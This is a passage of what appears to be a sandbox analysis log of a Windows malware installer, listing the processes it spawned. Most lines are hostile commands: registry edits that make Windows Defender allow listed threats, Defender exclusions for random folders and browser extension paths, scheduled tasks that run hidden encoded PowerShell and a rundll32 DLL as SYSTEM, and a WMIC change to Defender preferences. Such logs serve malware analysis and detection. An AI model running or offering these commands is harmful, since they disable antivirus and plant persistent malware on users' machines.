    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5848
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COTBHeEKJKUzC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COTBHeEKJKUzC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kiKoPuWzhpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kiKoPuWzhpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rtDrRvuxKPwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rtDrRvuxKPwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vlCOWAlJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vlCOWAlJU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vykAhZeXpicBybwuUhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vykAhZeXpicBybwuUhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cxMrmvGIsbUIWOVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cxMrmvGIsbUIWOVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rfjZnoYAHKowyeWd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rfjZnoYAHKowyeWd\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COTBHeEKJKUzC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1276
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COTBHeEKJKUzC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COTBHeEKJKUzC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kiKoPuWzhpUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kiKoPuWzhpUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rtDrRvuxKPwU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rtDrRvuxKPwU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vlCOWAlJU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vlCOWAlJU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vykAhZeXpicBybwuUhR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vykAhZeXpicBybwuUhR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cxMrmvGIsbUIWOVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cxMrmvGIsbUIWOVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rfjZnoYAHKowyeWd /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rfjZnoYAHKowyeWd /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3048
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gZhiHDqBV" /SC once /ST 07:23:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gZhiHDqBV"
  2⤵
  PID:3908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gZhiHDqBV"
  2⤵
  PID:1208
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "KMKZNsbMjnleoheHI" /SC once /ST 05:38:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rfjZnoYAHKowyeWd\dzCWPgBwyWjFMdz\GEIkgif.exe\" g8 /PIeNdidxh 525403 /S" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "KMKZNsbMjnleoheHI"
  2⤵
  PID:3256
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 896
  2⤵
  - Program crash
  PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4604 -ip 4604
1⤵
PID:5640

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:5280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3928
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2688

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3852

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:5336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc63546f8,0x7ffcc6354708,0x7ffcc6354718
  2⤵
  PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16750558769985597346,11988010467216596694,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,16750558769985597346,11988010467216596694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:3
  2⤵
  PID:2500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,16750558769985597346,11988010467216596694,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16750558769985597346,11988010467216596694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16750558769985597346,11988010467216596694,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16750558769985597346,11988010467216596694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2252 /prefetch:1
  2⤵
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16750558769985597346,11988010467216596694,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1
  2⤵
  PID:5136

C:\Windows\Temp\rfjZnoYAHKowyeWd\dzCWPgBwyWjFMdz\GEIkgif.exe
C:\Windows\Temp\rfjZnoYAHKowyeWd\dzCWPgBwyWjFMdz\GEIkgif.exe g8 /PIeNdidxh 525403 /S
1⤵
PID:5748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bmEYWRTMKrukfekPRJ"
  2⤵
  PID:5184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5524
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:3256
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:6000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5096
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5112
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vlCOWAlJU\xrKwVR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gHYBCAXDQQwgszt" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4312
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 2336
  2⤵
  - Program crash
  PID:1344
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 2168
  2⤵
  - Program crash
  PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1504 -ip 1504
1⤵
PID:3684

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3620

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\7zSF716.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSF716.tmp\Install.exe hU /EVdidvM 385132 /S
1⤵
PID:4556
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 